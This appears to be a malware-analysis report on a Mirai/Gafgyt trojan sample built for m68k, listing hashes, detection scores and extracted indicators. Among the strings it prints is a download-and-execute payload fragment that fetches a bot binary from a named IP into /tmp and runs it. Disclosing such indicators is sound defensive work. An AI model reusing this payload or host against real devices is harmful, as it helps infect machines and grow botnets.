db0fa4b8db0333367e9bda3ab68b8042.m68k
First submission 2024-10-17 13:16:02
File details
File type: | ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped |
Mime type: | application/x-executable |
File size: | 81.32 KB (83268 bytes) |
MD5: | be7b5d0f87efeb752cefc89442d7161f |
SHA1: | 336d812fd007007f3d613480a782f851881eaf87 |
SHA256: | a2d47438ad3da55b76213c95deebe0a1953f92480a215ec562dfadd47d4c7833 |
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
OSINT Enrichments
Virus Total: | 43/77 VT report date: 2024-10-17 02:03:41 |
Malware Type 1 | trojan |
Threat Type 3 | mirai gafgyt smmr1 |
URLs, FQDN and IP indicators 1
Strings analysis - Possible IPs found 2
172.236.29.44 |
127.0.0.1 |
Strings analysis - Possible URLs found 3
http://schemas.xmlsoap.org/soap/encoding/ |
http://schemas.xmlsoap.org/soap/envelope/ |
http://172.236.29.44/bin+-O+/tmp/gaf;sh+/tmp/gaf |